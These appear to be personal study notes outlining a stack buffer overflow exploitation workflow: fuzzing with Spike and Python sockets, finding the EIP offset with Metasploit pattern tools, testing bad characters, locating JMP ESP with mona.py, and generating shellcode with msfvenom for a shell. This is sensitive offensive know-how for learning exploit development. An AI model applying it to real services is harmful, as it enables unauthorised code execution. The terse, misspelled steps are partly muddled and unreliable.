Automated
mona in Immunity Debugger - can automate this
Spike scripts
Example of scripts(.spk) : s_readline(); s_string(“XXX ”); (Name of the program/tools) s_string_variable(“0”);
Immunity Debugger
To listen to an actual program running and find potential buffer overlow
Manual
1st Spike generic_send_tcp (On kali) - host port spike_script 2nd Fuzzing In python for example / using sockets - connect / basically send a buffer + “A”*100 - record number of A as X bytes / display crashed at X bytes 3rd Finding the offset Metasploit / tools/exploit/pattern_create.rb -l (Lenght of bytes that crashed) Run same python script but no with a loop, with a “try” - send the full offset read EIP to check which part of the patern is visible metasploit/share - exploit/pattern_offset.rb -l lenght -q EIP value 4th Overwrite EIP Same scripts but remove buffer | Instead shellcode = “A” * nb_bytes + “B” * 4 5th Badchars github badchars generator tool to find bad characters TO test characters that will crash the program so that way we don’t use them 6th Exploit Use mona.py in immunity debugger to conceive payload metasploit/exploit/nasm_shell.rb - JMP ESP (Jump to malicious shell code) FFE4 - (Above in machine code) Find vuln code to payload /!\ REVERSE PAYLOAD IF x86 infras 7th Gain shell msfvenom | Tools to generate shellcode